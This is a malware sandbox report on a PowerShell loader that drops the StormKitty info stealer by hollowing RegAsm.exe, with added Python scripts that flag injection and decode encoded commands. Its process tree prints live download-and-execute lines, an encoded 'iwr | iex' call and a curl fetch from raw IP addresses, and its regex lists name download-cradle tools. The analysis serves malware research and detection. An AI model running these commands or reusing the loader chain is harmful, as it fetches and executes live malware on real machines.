Analysis
max time kernel: 92s
max time network: 148s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 03/01/2025, 03:16
Static task: static1
Behavioral task: behavioral1
Sample: 1c98e715eb65ef733d18ece227297105e5dcea55ab37dc177778da3ff714da21.ps1
Resource: win7-20240729-en
General
Target: 1c98e715eb65ef733d18ece227297105e5dcea55ab37dc177778da3ff714da21.ps1
Size: 168B
MD5: 2dc54835b9c45ed739a864b1732f7cd6
SHA1: 7df3a0414a8972dcb6c025f14646d8570a117b40
SHA256: 1c98e715eb65ef733d18ece227297105e5dcea55ab37dc177778da3ff714da21
SHA512: 42a57f6d58b302e3a239dbb2e1f282d1b8d1446f93bc60e65933da64361a876c238d12b2eae3ab53eaf20f1973888714363e628beb9d718a9f5d827416aea40f
Malware Config
Signatures

Asyncrat family

StormKitty
StormKitty is an open source info stealer written in C#.

StormKitty payload 1 IoCs
resource                                                                      yara_rule
behavioral2/memory/4692-60-0x0000000000400000-0x0000000000704000-memory.dmp   family_stormkitty

Stormkitty family

Blocklisted process makes network request 3 IoCs
flow  pid   Process
5     1108  powershell.exe
8     1108  powershell.exe
17    4944  powershell.exe

pid   Process
4592  powershell.exe
1108  powershell.exe
4944  powershell.exe

Downloads MZ/PE file

Drops startup file 1 IoCs
description                   ioc                                                                                         Process
File opened for modification  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DeleteApp.url  powershell.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.

Suspicious use of SetThreadContext 1 IoCs
description                          pid   Process         procid_target
PID 4944 set thread context of 4692  4944  powershell.exe  94
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.
description  ioc                                                          Process
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  RegAsm.exe

Suspicious behavior: EnumeratesProcesses 11 IoCs
pid   Process         count
4592  powershell.exe  2
1108  powershell.exe  4
4944  powershell.exe  2
4692  RegAsm.exe      3

Suspicious use of AdjustPrivilegeToken 4 IoCs
description              pid   Process
Token: SeDebugPrivilege  4592  powershell.exe
Token: SeDebugPrivilege  1108  powershell.exe
Token: SeDebugPrivilege  4944  powershell.exe
Token: SeDebugPrivilege  4692  RegAsm.exe

Suspicious use of SetWindowsHookEx 1 IoCs
pid   Process
4692  RegAsm.exe

Suspicious use of WriteProcessMemory 22 IoCs
description                       pid   Process         procid_target  count
PID 4592 wrote to memory of 1108  4592  powershell.exe  86             2
PID 1108 wrote to memory of 3328  1108  powershell.exe  87             2
PID 3328 wrote to memory of 3808  3328  cmd.exe         88             2
PID 3328 wrote to memory of 4944  3328  cmd.exe         89             2
PID 3808 wrote to memory of 5040  3808  cmd.exe         90             2
PID 4944 wrote to memory of 4724  4944  powershell.exe  91             2
PID 4724 wrote to memory of 4252  4724  csc.exe         92             2
PID 4944 wrote to memory of 4692  4944  powershell.exe  94             8
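The SetThreadContext and WriteProcessMemory rows above are the evidence for how the payload ends up running. Every spawn in the tree leaves a pair of parent-to-child writes (the loader populating the new process), but powershell.exe (4944) wrote into RegAsm.exe (4692) eight times and then reset its thread context, and the StormKitty YARA rule fired on a dump of that process starting at 0x400000, the default image base of a 32-bit PE, which fits the 32-bit Framework\ RegAsm.exe and the /MACHINE:IX86 cvtres run. The Python below is an added analysis example, not part of the Triage report or its tooling: it tallies the rows as transcribed from the tables, subtracts the spawn-time writes, flags source/target pairs that also had a thread-context change, and links the YARA hit to the hollowed process by parsing the dump name. The list of hollowing host binaries is the example's own assumption.

```python
"""Correlate sandbox cross-process API rows into an injection verdict.

Added analysis example, not part of the Triage report. The event rows are
transcribed from the signature tables; KNOWN_HOSTS is an analyst assumption.
"""
import re
from typing import Dict, List, Tuple

# Process list from the tree: pid -> image name.
PROCESSES: Dict[int, str] = {
    4592: "powershell.exe", 1108: "powershell.exe", 3328: "cmd.exe",
    3808: "cmd.exe", 5040: "curl.exe", 4944: "powershell.exe",
    4724: "csc.exe", 4252: "cvtres.exe", 4692: "RegAsm.exe",
}
# Parent pid of each child, read off the tree.
PARENT: Dict[int, int] = {
    1108: 4592, 3328: 1108, 3808: 3328, 4944: 3328, 5040: 3808,
    4724: 4944, 4252: 4724, 4692: 4944,
}
# "PID A wrote to memory of B" rows, tallied as (source, target, count).
WRITES: List[Tuple[int, int, int]] = [
    (4592, 1108, 2), (1108, 3328, 2), (3328, 3808, 2), (3328, 4944, 2),
    (3808, 5040, 2), (4944, 4724, 2), (4724, 4252, 2), (4944, 4692, 8),
]
# "PID A set thread context of B" rows.
THREAD_CONTEXT: List[Tuple[int, int]] = [(4944, 4692)]
# YARA hits on memory dumps, as (dump resource name, rule).
YARA_HITS = [
    ("behavioral2/memory/4692-60-0x0000000000400000-0x0000000000704000-memory.dmp",
     "family_stormkitty"),
]

# Assumption: signed .NET utilities routinely spawned by PowerShell and therefore
# favoured as hollowing hosts. Extend from your own telemetry.
KNOWN_HOSTS = {"regasm.exe", "regsvcs.exe", "msbuild.exe", "installutil.exe",
               "aspnet_compiler.exe", "applaunch.exe"}

# A plain CreateProcess shows up as a pair of parent-to-child writes in the
# sandbox; anything beyond that is the parent's own code writing into the child.
SPAWN_WRITES = 2

DUMP_RE = re.compile(r"(\d+)-\d+-0x([0-9a-fA-F]+)-0x([0-9a-fA-F]+)-memory\.dmp$")


def parse_dump_name(name: str):
    """Return (pid, start, end) from a Triage memory-dump resource name, or None."""
    m = DUMP_RE.search(name)
    if not m:
        return None
    return int(m.group(1)), int(m.group(2), 16), int(m.group(3), 16)


def classify_injections(writes, thread_context, parent, processes, spawn_writes=SPAWN_WRITES):
    """One finding per (source, target) pair whose activity exceeds a plain spawn."""
    ctx = set(thread_context)
    findings = []
    for src, dst, count in writes:
        spawned = parent.get(dst) == src
        extra = count - (spawn_writes if spawned else 0)
        if extra <= 0 and (src, dst) not in ctx:
            continue  # only the loader's writes during CreateProcess
        if (src, dst) in ctx:
            host = processes.get(dst, "").lower()
            verdict = "process-hollowing" if host in KNOWN_HOSTS else "thread-context-injection"
        else:
            verdict = "unexplained-cross-process-write"
        findings.append({
            "source": (src, processes.get(src)),
            "target": (dst, processes.get(dst)),
            "extra_writes": extra,
            "verdict": verdict,
            "yara": [],
            "region": None,
        })
    return findings


def attach_yara_hits(findings, yara_hits):
    """Link memory-dump YARA matches to the finding whose target pid owns the dump."""
    for name, rule in yara_hits:
        parsed = parse_dump_name(name)
        if parsed is None:
            continue
        pid, start, end = parsed
        for f in findings:
            if f["target"][0] == pid:
                f["yara"].append(rule)
                f["region"] = (start, end)
    return findings


def analyse():
    """Run the correlation over the transcribed report rows."""
    findings = classify_injections(WRITES, THREAD_CONTEXT, PARENT, PROCESSES)
    return attach_yara_hits(findings, YARA_HITS)


if __name__ == "__main__":
    for f in analyse():
        src, dst = f["source"], f["target"]
        line = f"{f['verdict']}: {src[1]} ({src[0]}) -> {dst[1]} ({dst[0]}), {f['extra_writes']} extra writes"
        if f["region"]:
            line += f", dump 0x{f['region'][0]:x}-0x{f['region'][1]:x} matched {', '.join(f['yara'])}"
        print(line)
```

The spawn-write subtraction is what keeps the seven legitimate parent/child pairs in this tree out of the output; only the powershell.exe (4944) to RegAsm.exe (4692) pair survives, and the dump region 0x400000-0x704000 (about 3 MB) is the injected image to carve out for static analysis.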
Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 4592)
  powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\1c98e715eb65ef733d18ece227297105e5dcea55ab37dc177778da3ff714da21.ps1
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 1108)
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -enc aQB3AHIAIAAtAHUAcwBlAGIAIABoAHQAdABwADoALwAvADEAOAA1AC4AMQA0ADkALgAxADQANgAuADEANgA0AC8AdAByAHcAcwBmAGcALgBwAHMAMQAgAHwAIABpAGUAeAA=
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Drops startup file
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\cmd.exe  (PID 3328)
      "C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\Modules.bat"
      - Suspicious use of WriteProcessMemory

      C:\Windows\system32\cmd.exe  (PID 3808)
        cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/vfrcxq.ps1
        - Suspicious use of WriteProcessMemory

        C:\Windows\system32\curl.exe  (PID 5040)
          curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/vfrcxq.ps1

      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 4944)
        powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -"
        - Blocklisted process makes network request
        - Command and Scripting Interpreter: PowerShell
        - Suspicious use of SetThreadContext
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory

        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  (PID 4724)
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jz0demgd\jz0demgd.cmdline"
          - Suspicious use of WriteProcessMemory

          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe  (PID 4252)
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB95D.tmp" "c:\Users\Admin\AppData\Local\Temp\jz0demgd\CSCF872008EF85B4AECBB688B36E967C51D.TMP"

        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  (PID 4692)
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          - System Location Discovery: System Language Discovery
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of SetWindowsHookEx
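The tree reads as a three-stage loader. The submitted .ps1 runs a hidden, encoded command; the -enc argument is base64 over UTF-16LE and decodes to `iwr -useb http://185.149.146.164/trwsfg.ps1 | iex`. That stage launches C:\Windows\Temp\Modules.bat, which fetches a second script with curl and a fixed X-Special-Header value (worth recording, since the fetch may not reproduce without it) and pipes it into `powershell -Command -`, which reads its script from standard input so the second stage never has to be written to disk under a name. That stage compiles C# on the fly with csc.exe and hollows RegAsm.exe. The Python below is an added triage example, not part of the report or the tria.ge tooling: it decodes -EncodedCommand arguments in any of the prefix spellings powershell.exe accepts, pulls URLs and custom headers from both the raw and the decoded text, and tags the evasion patterns a detection rule would key on. The command lines are transcribed from the tree above; the flag names and regular expressions are the example's own.

```python
"""Decode and triage PowerShell / cmd command lines from a sandbox process tree.

Added analysis example, not part of the Triage report. The sample command
lines are transcribed from the process tree; flag names are the example's own.
"""
import base64
import ipaddress
import re
from urllib.parse import urlparse

SAMPLE_CMDLINES = [
    r"powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\1c98e715eb65ef733d18ece227297105e5dcea55ab37dc177778da3ff714da21.ps1",
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -enc aQB3AHIAIAAtAHUAcwBlAGIAIABoAHQAdABwADoALwAvADEAOAA1AC4AMQA0ADkALgAxADQANgAuADEANgA0AC8AdAByAHcAcwBmAGcALgBwAHMAMQAgAHwAIABpAGUAeAA=',
    r'cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/vfrcxq.ps1',
    r'powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -"',
]

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
_ENC_PREFIXES = ["encodedcommand"[:n] for n in range(1, len("encodedcommand") + 1)]
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(?:" + "|".join(_ENC_PREFIXES) + r")\s+([A-Za-z0-9+/=]+)")
URL_RE = re.compile(r"https?://[^\s\"'<>|]+")
HEADER_RE = re.compile(r"-H\s+[\"']([^\"':]+):\s*([^\"']*)[\"']")  # curl -H "Name: value"
CRADLE_RE = re.compile(
    r"(?i)\b(iwr|iex|invoke-webrequest|invoke-expression|invoke-restmethod|"
    r"downloadstring|downloadfile|start-bitstransfer|curl|wget|certutil)\b"
)


def decode_encoded_command(b64: str) -> str:
    """Decode the argument of -EncodedCommand: base64 over UTF-16LE text."""
    b64 = b64 + "=" * (-len(b64) % 4)  # tolerate stripped padding
    return base64.b64decode(b64).decode("utf-16-le")


def _is_raw_ip(url: str) -> bool:
    """True when the URL host is a literal IP address rather than a name."""
    try:
        ipaddress.ip_address(urlparse(url).hostname or "")
        return True
    except ValueError:
        return False


def triage_cmdline(cmdline: str) -> dict:
    """Return decoded text, URLs, custom headers and suspicion flags for one command line."""
    decoded = None
    m = ENC_FLAG.search(cmdline)
    if m:
        try:
            decoded = decode_encoded_command(m.group(1))
        except (ValueError, UnicodeDecodeError):
            decoded = None  # not a valid encoded command; analyse the raw line only
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    urls = URL_RE.findall(text)
    headers = {name: value for name, value in HEADER_RE.findall(text)}

    low = text.lower()
    flags = []
    if decoded is not None:
        flags.append("encoded-command")
    if re.search(r"-w(?:indowstyle)?\s+hidden", low):
        flags.append("hidden-window")
    if re.search(r"-e(?:xecutionpolicy)?\s+bypass", low):
        flags.append("executionpolicy-bypass")
    if re.search(r'-c(?:ommand)?\s+-(?:[\s"]|$)', low):
        flags.append("script-from-stdin")  # -Command - reads the script from stdin
    if CRADLE_RE.search(text):
        flags.append("download-cradle")
    if any(_is_raw_ip(u) for u in urls):
        flags.append("raw-ip-url")
    if headers:
        flags.append("custom-http-header")
    return {"decoded": decoded, "urls": urls, "headers": headers, "flags": flags}


def collect_network_iocs(cmdlines) -> dict:
    """Aggregate URLs, hosts and custom headers across a process tree's command lines."""
    urls, hosts, headers = set(), set(), {}
    for cmdline in cmdlines:
        result = triage_cmdline(cmdline)
        urls.update(result["urls"])
        hosts.update(h for h in (urlparse(u).hostname for u in result["urls"]) if h)
        headers.update(result["headers"])
    return {"urls": sorted(urls), "hosts": sorted(hosts), "headers": headers}


if __name__ == "__main__":
    for cmdline in SAMPLE_CMDLINES:
        result = triage_cmdline(cmdline)
        print(cmdline[:60], result["flags"], result["urls"], result["decoded"])
    print(collect_network_iocs(SAMPLE_CMDLINES))
```

Running the decoder over the raw line as well as the decoded text matters here: the first URL is only visible after decoding, while the second sits in a plain cmd.exe line, and the header value is what a replay of the curl request has to carry.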
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 3KB
MD5: 556084f2c6d459c116a69d6fedcc4105
SHA1: 633e89b9a1e77942d822d14de6708430a3944dbc
SHA256: 88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA512: 0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

Filesize: 64B
MD5: f537ae521efb4e130b96c6baef339c61
SHA1: 542a0a5af1576420842f9600d6fd37a17d1dfaec
SHA256: 85fe9d7c91403c511b7cf060fe3d509510d709b133deb537a407301f71d7264f
SHA512: b1b3aa4adf6039f549bdca35c2ed44d2d80d3142558533eaad327440f77ed801426e35f39425a4973601b85ebe5cfd5dd41e973997cfcddae29fe46d2a09c5f0

Filesize: 1KB
MD5: 8cc6f75cee94ec81ebb0affc8f9e6067
SHA1: 09899dcda145b49054103dbde53f56af018ce84f
SHA256: f3edf555378d440fa91a3e6691b15b73420fef4f2e0aa2444d7b9c12dd45621f
SHA512: 71e6e73fb6e95f320b672871528873b072132c991e93d2e56b1060758096c03cc52ebb1c4b70539029fc1dd53becb0b00e4388c88b9d908942f6cf248e5b5ebf

Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Filesize: 9KB
MD5: 34bd2b7019b88374f7f90dd59444be5b
SHA1: e9a0d9a954c0154ee4bc2bd1b8795d203add460c
SHA256: a773f14ea742c498c6559856f2bd8604646107ad82623bd7fc4d483ac49e3e3a
SHA512: 59e0cf97acfd72de911a98a42bb5d19b7c0b7470fd97e76def3bd404a87cd8390b469077d2d41df2ce403cdd62a4a7c5bc238feea611e1ac9473add2f3b07518

Filesize: 3KB
MD5: bb445d197063475c8d78de4f0825753c
SHA1: 158a8e3b278affe7c1185aad67683e4253cf53dd
SHA256: 7066e4a496d83ee1b677ade06c868a432bb4a0dd364b19ee184147a527b11c10
SHA512: 173cd8a56e2fa6e8db33bc13870f8751473251aa80be2235321e62b0f84961e9fd00a236aec63342d73f262dbc7c2a920951a1a8f41707ca6640e673f21c4307

Filesize: 652B
MD5: 23ba47f7a23ec0f885aaf502e2e2b996
SHA1: ab801d437d6ce12600cf0493cfa8b0994e720762
SHA256: 1c55ea2862b6ab6c8f4d66a1b15c32b0c914598d00fcc7b4409952b2a82b73e6
SHA512: a825048e0130d56f03f985c1e20f9704a4c784f54814878764311d8c3e74e049bfe200d727dc2d9f2daeda3faf2dbe4cfdd990c9831f96f1d358322d9a792d8c

Filesize: 10KB
MD5: b5c3a2d03ff4c721192716f326c77dea
SHA1: 6b754fd988ca58865674b711aba76d3c6b2c5693
SHA256: ab42fe5fd08cb87663e130f99f96124fdd37d825d081b9712b0bad8b6f270fac
SHA512: d32e5a98c12b6b85d1913555ea54f837cd0fc647ca945aef9d75ffade06506be1f4a2348827f11c4eeae0796e4156c8f352e3c0f9a6e2cdc93cb501bcdf2c248

Filesize: 204B
MD5: 9a95f080b96e4e217107cbdb8f0101cd
SHA1: 869fbe60e1cac976f7a06b0be3cb5db202fe1592
SHA256: 23855ae07dc485f9cccc376ce2c7479e1ab808cc50da50f028b184456f49046f
SHA512: 27bd87623dd2f8054ff5caf47dc62c8882abf1c0bc4d8d703d4f7af1a18db9d9aa0b91adf5734d7ffdc47e30913a2a8b6bc05fa8adc3ca1d2deca739e0534010